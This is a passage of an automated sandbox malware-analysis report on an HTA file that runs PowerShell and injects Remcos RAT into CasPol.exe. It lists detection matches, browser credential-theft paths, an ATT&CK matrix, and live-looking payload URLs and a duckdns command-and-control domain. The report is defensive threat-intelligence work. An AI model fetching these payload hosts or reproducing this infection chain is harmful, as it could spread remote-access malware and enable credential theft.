Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.SecureBoot.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.SecureBoot.Commands.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.WindowsAuthenticationProtocols.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.WindowsAuthenticationProtocols.Commands.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.WindowsAuthenticationProtocols.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.WindowsAuthenticationProtocols.Commands.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.WindowsAuthenticationProtocols.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.WindowsAuthenticationProtocols.Commands.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package0012~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-UEV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\UEV\Microsoft.Uev.Commands.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\WindowsErrorReporting\Microsoft.WindowsErrorReporting.PowerShell.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Program Files (x86)\AutoIt3\AutoItX\AutoItX3.PowerShell.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe

Code function: 12_2_00404915 GetLocalTime,CreateEventA,CreateThread,

12_2_00404915

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe

Code function: 12_2_0041A7B2 GetComputerNameExW,GetUserNameW,

12_2_0041A7B2

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe

Code function: 12_2_0044801F _free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,_free,

12_2_0044801F

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Stealing of Sensitive Information

Yara detected Remcos RAT

Source: Yara match	File source: 12.2.CasPol.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.CasPol.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.powershell.exe.90965d0.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.powershell.exe.90965d0.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000C.00000002.4558010842.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.2521285929.0000000009096000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.4561290928.0000000001068000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.2485339671.0000000005466000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: powershell.exe PID: 6556, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: CasPol.exe PID: 6284, type: MEMORYSTR

Contains functionality to steal Chrome passwords or cookies

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe

Code function: \AppData\Local\Google\Chrome\User Data\Default\Login Data

12_2_0040B21B

Contains functionality to steal Firefox passwords or cookies

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: \AppData\Roaming\Mozilla\Firefox\Profiles\		12_2_0040B335
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: \key3.db		12_2_0040B335

Remote Access Functionality

Detected Remcos RAT

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe

Mutex created: \Sessions\1\BaseNamedObjects\Rmc-PVMSPM

Jump to behavior

Yara detected Remcos RAT

Source: Yara match	File source: 12.2.CasPol.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.CasPol.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.powershell.exe.90965d0.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.powershell.exe.90965d0.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000C.00000002.4558010842.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.2521285929.0000000009096000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.4561290928.0000000001068000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.2485339671.0000000005466000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: powershell.exe PID: 6556, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: CasPol.exe PID: 6284, type: MEMORYSTR

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe

Code function: cmd.exe

12_2_00405042

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	111 Scripting	Valid Accounts	1 Native API	111 Scripting	1 DLL Side-Loading	1 Deobfuscate/Decode Files or Information	1 OS Credential Dumping	2 System Time Discovery	Remote Services	11 Archive Collected Data	1 Web Service	Exfiltration Over Other Network Medium	1 System Shutdown/Reboot
Credentials	Domains	Default Accounts	1 Exploitation for Client Execution	1 DLL Side-Loading	1 Bypass User Account Control	2 Obfuscated Files or Information	111 Input Capture	1 Account Discovery	Remote Desktop Protocol	1 Email Collection	12 Ingress Tool Transfer	Exfiltration Over Bluetooth	1 Defacement
Email Addresses	DNS Server	Domain Accounts	13 Command and Scripting Interpreter	1 Windows Service	1 Access Token Manipulation	1 DLL Side-Loading	2 Credentials In Files	1 System Service Discovery	SMB/Windows Admin Shares	111 Input Capture	21 Encrypted Channel	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	2 Service Execution	Login Hook	1 Windows Service	1 Bypass User Account Control	NTDS	3 File and Directory Discovery	Distributed Component Object Model	3 Clipboard Data	1 Non-Standard Port	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	3 PowerShell	Network Logon Script	221 Process Injection	1 Masquerading	LSA Secrets	34 System Information Discovery	SSH	Keylogging	1 Remote Access Software	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	21 Virtualization/Sandbox Evasion	Cached Domain Credentials	21 Security Software Discovery	VNC	GUI Input Capture	2 Non-Application Layer Protocol	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	1 Access Token Manipulation	DCSync	21 Virtualization/Sandbox Evasion	Windows Remote Management	Web Portal Capture	213 Application Layer Protocol	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	221 Process Injection	Proc Filesystem	2 Process Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement
Network Topology	Malvertising	Exploit Public-Facing Application	Command and Scripting Interpreter	At	At	HTML Smuggling	/etc/passwd and /etc/shadow	1 Application Window Discovery	Direct Cloud VM Connections	Data Staged	Web Protocols	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Internal Defacement
IP Addresses	Compromise Infrastructure	Supply Chain Compromise	PowerShell	Cron	Cron	Dynamic API Resolution	Network Sniffing	1 System Owner/User Discovery	Shared Webroot	Local Data Staging	File Transfer Protocols	Exfiltration Over Asymmetric Encrypted Non-C2 Protocol	External Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
creamkissingthingswithcreambananapackagecreamy.hta	40%	Virustotal		Browse
creamkissingthingswithcreambananapackagecreamy.hta	24%	ReversingLabs	Script-WScript.Trojan.Asthma

Source	Detection	Scanner	Label	Link
http://192.210.150.24/55/creamykissinglipsgoodforcreamythingswithcreamicream.tIFz	0%	Avira URL Cloud	safe
http://192.210.150.24/55/creamyk	0%	Avira URL Cloud	safe
http://192.210.150.24/55/creamykissinglipsgoodforcreamythingswithcreamicream.tIFs	0%	Avira URL Cloud	safe
http://192.210.150.24/55/creamykissinglipsgoodforcreamythingswithcreamicream.tIF	0%	Avira URL Cloud	safe
http://www.microsoft.G	0%	Avira URL Cloud	safe
http://192.210.150.24/55/creamykissinglipsgoodforcreamythingswithcreamicream.tIFf	0%	Avira URL Cloud	safe
http://192.210.150.24/55/creamykissinglipsgoodforcreamythingswithcreamicream.tIF	0%	Virustotal		Browse
http://192.210.150.24/55/creamykissinglipsgoodforcreamythingswithcreamicream.tIFC:	0%	Avira URL Cloud	safe
http://www.microsoft.co#v	0%	Avira URL Cloud	safe
http://192.210.150.24/55/creamykissinglipsgoodforcreamythingswithcreamicream.tIFwp	0%	Avira URL Cloud	safe
http://www.microsoft.covVc	0%	Avira URL Cloud	safe
http://192.210.150.24/55/creamykissinglipsgoodforcreamythingswithcreamicream.tIFsx	0%	Avira URL Cloud	safe
http://192.210.150.24/55/creamykissinglipsgoodforcreamythingswithcreamicream.tIF#p	0%	Avira URL Cloud	safe
http://192.210.150.24/55/creamykissinglipsgoodforcreamythingswithcreamicream.tIFR	0%	Avira URL Cloud	safe
newglobalfucntioninside.duckdns.org	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Reputation
paste.ee	104.21.84.67	true	false	high
cloudinary.map.fastly.net	151.101.1.137	true	false	high
newglobalfucntioninside.duckdns.org	107.173.143.10	true	false	high
res.cloudinary.com	unknown	unknown	false	high

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
https://paste.ee/r/o8fzA/0	false		high
http://192.210.150.24/55/creamykissinglipsgoodforcreamythingswithcreamicream.tIF	true	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://res.cloudinary.com/dytflt61n/image/upload/v1733134947/bklpyseyeut4impw50n1.jpg	false		high
newglobalfucntioninside.duckdns.org	true	Avira URL Cloud: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://192.210.150.24/55/creamyk	powershell.exe, 00000003.00000002.2247409766.0000000004E38000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://nuget.org/NuGet.exe	powershell.exe, 00000003.00000002.2249490766.0000000005D46000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2485339671.0000000005466000.00000004.00000800.00020000.00000000.sdmp	false		high
https://aka.ms/winsvr-2022-pshelp	powershell.exe, 00000003.00000002.2247409766.0000000004E38000.00000004.00000800.00020000.00000000.sdmp	false		high
http://pesterbdd.com/images/Pester.png	powershell.exe, 00000008.00000002.2485339671.0000000004557000.00000004.00000800.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/soap/encoding/	powershell.exe, 00000003.00000002.2247409766.0000000004E38000.00000004.00000800.00020000.00000000.sdmp	false		high
http://crl.microsoft	powershell.exe, 00000008.00000002.2517116385.0000000006DD0000.00000004.00000020.00020000.00000000.sdmp	false		high
http://www.apache.org/licenses/LICENSE-2.0.html	powershell.exe, 00000008.00000002.2485339671.0000000004557000.00000004.00000800.00020000.00000000.sdmp	false		high
https://go.micro	powershell.exe, 00000003.00000002.2247409766.0000000004E38000.00000004.00000800.00020000.00000000.sdmp	false		high
https://contoso.com/License	powershell.exe, 00000008.00000002.2485339671.0000000005466000.00000004.00000800.00020000.00000000.sdmp	false		high
https://www.google.com;	powershell.exe, 00000008.00000002.2485339671.0000000004557000.00000004.00000800.00020000.00000000.sdmp	false		high
http://192.210.150.24/55/creamykissinglipsgoodforcreamythingswithcreamicream.tIFz	powershell.exe, 00000003.00000002.2252958107.0000000008431000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://contoso.com/Icon	powershell.exe, 00000008.00000002.2485339671.0000000005466000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.microsoft.G	powershell.exe, 00000003.00000002.2252958107.00000000083B2000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://analytics.paste.ee	powershell.exe, 00000008.00000002.2485339671.0000000004557000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.microsoft.	powershell.exe, 00000003.00000002.2250935390.000000000743D000.00000004.00000020.00020000.00000000.sdmp	false		high
http://192.210.150.24/55/creamykissinglipsgoodforcreamythingswithcreamicream.tIFs	powershell.exe, 00000003.00000002.2252958107.00000000083B2000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://192.210.150.24/55/creamykissinglipsgoodforcreamythingswithcreamicream.tIFf	powershell.exe, 00000003.00000002.2252958107.0000000008431000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://go.micros	powershell.exe, 00000003.00000002.2247409766.0000000004E38000.00000004.00000800.00020000.00000000.sdmp	false		high
https://github.com/Pester/Pester	powershell.exe, 00000008.00000002.2485339671.0000000004557000.00000004.00000800.00020000.00000000.sdmp	false		high
http://192.210.150.24/55/creamykissinglipsgoodforcreamythingswithcreamicream.tIFC:	powershell.exe, 00000003.00000002.2246508978.0000000002EBF000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://192.210.150.24/55/creamykissinglipsgoodforcreamythingswithcreamicream.tIFwp	powershell.exe, 00000003.00000002.2250935390.0000000007465000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
